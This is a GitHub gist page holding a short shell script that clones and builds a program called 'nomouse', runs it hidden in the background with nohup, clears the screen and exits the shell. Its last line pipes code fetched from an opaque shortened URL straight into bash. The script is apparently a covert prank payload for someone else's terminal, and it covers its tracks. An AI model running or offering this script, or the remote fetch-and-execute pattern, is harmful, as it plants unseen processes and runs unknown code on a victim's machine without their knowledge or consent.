Skip to content

Instantly share code, notes, and snippets.

@ismaelga
Last active March 13, 2017 04:12
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ismaelga/bfee698a227be576b682e2d7adc00c81 to your computer and use it in GitHub Desktop.
Save ismaelga/bfee698a227be576b682e2d7adc00c81 to your computer and use it in GitHub Desktop.
CURRENT=`pwd`
cd /tmp
git clone https://github.com/brhs/nomouse.git
cd nomouse
make
nohup ./bin/nomouse &
cd $CURRENT
clear
exit
curl -Ls goo.gl/INso28 | bash
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment